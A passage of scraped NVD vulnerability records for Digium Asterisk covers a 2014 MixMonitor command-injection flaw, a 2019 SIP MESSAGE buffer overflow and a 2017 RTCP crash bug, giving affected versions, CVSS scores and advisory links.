    {
      "source": "cve@mitre.org",
      "tags": [
        "Permissions Required"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0449"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64831"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/70518"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/42935"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/43119"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/43373"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2011/dsa-2171"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/515781/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/45839"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0159"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0281"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0449"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64831"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-787"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-06-17 14:55

Modified

2024-11-21 02:09

Severity ?

Summary

Asterisk Open Source 11.x before 11.10.1 and 12.x before 12.3.1 and Certified Asterisk 11.6 before 11.6-cert3 allows remote authenticated Manager users to execute arbitrary shell commands via a MixMonitor action.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-006.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html
cve@mitre.org	http://www.securityfocus.com/archive/1/532419/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-006.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/532419/100/0/threaded

Impacted products

Vendor	Product	Version
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 11.x before 11.10.1 and 12.x before 12.3.1 and Certified Asterisk 11.6 before 11.6-cert3 allows remote authenticated Manager users to execute arbitrary shell commands via a MixMonitor action."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source 11.x anterior a 11.10.1 y 12.x anterior a 12.3.1 y Certified Asterisk 11.6 anterior a 11.6-cert3 permite a usuarios remotos autenticados Manager ejecutar comandos del sistema arbitrarios a trav\u00e9s de una acci\u00f3n MixMonitor."
    }
  ],
  "evaluatorComment": "Per: http://cwe.mitre.org/data/definitions/77.html\n\n\"CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)\"",
  "id": "CVE-2014-4046",
  "lastModified": "2024-11-21T02:09:24.273",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-06-17T14:55:07.893",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-006.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/532419/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/532419/100/0/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-07-12 20:15

Modified

2024-11-21 04:23

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

Buffer overflow in res_pjsip_messaging in Digium Asterisk versions 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 and earlier allows remote authenticated users to crash Asterisk by sending a specially crafted SIP MESSAGE message.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2019-002.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-28447	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2019-002.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-28447	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CCA6DD0A-1C55-4334-8AF3-DB7B2EFB07E0",
              "versionEndExcluding": "13.27.0",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "212B9BDD-ECC4-4CA3-B776-556C98EADF1D",
              "versionEndExcluding": "15.7.2",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E458297-5218-48A3-8690-66E6C6549757",
              "versionEndExcluding": "16.4.0",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "B7EE2BD3-51DC-4DA5-A5F2-6275F5277BE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DC85AF18-A304-4BD8-AFAA-F99AC37A799B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03094F8E-FF0C-4831-A50F-B601949FD3BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6A7B650A-4785-4A8B-BCB6-1B630A0E18E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "6B791DBB-EB45-4E9C-9C57-249D196EC0E5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in res_pjsip_messaging in Digium Asterisk versions 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 and earlier allows remote authenticated users to crash Asterisk by sending a specially crafted SIP MESSAGE message."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en res_pjsip_messaging en Digium Asterisk versiones 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 versiones anteriores permite a los atacantes remotos autenticados cerrar inesperadamente Asterisk enviando un mensaje SIP MESSAGE especialmente dise\u00f1ado."
    }
  ],
  "id": "CVE-2019-12827",
  "lastModified": "2024-11-21T04:23:40.063",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-07-12T20:15:11.063",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2019-002.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28447"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2019-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28447"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-787"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-12-13 20:29

Modified

2024-11-21 03:18

Severity ?

5.9 (Medium) - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2017-012.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/102201	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1040009	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27382	Issue Tracking, Patch, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27429	Issue Tracking, Vendor Advisory
cve@mitre.org	https://www.debian.org/security/2017/dsa-4076	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2017-012.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/102201	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1040009	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27382	Issue Tracking, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27429	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2017/dsa-4076	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	*
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "86CE0074-C728-4A0C-AF7B-E5F095C7AD9E",
              "versionEndExcluding": "13.18.4",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A023AEF-773E-4DD8-B860-5B1D4E061F85",
              "versionEndExcluding": "14.7.4",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8300EA07-CDDD-49C2-8F73-BBE6749000CB",
              "versionEndExcluding": "15.1.4",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF0E7AD0-0B51-47BC-8746-CAC7C63F8AE8",
              "versionEndIncluding": "13.13",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0449B393-FA4E-4664-8E16-BE6B94E4872F",
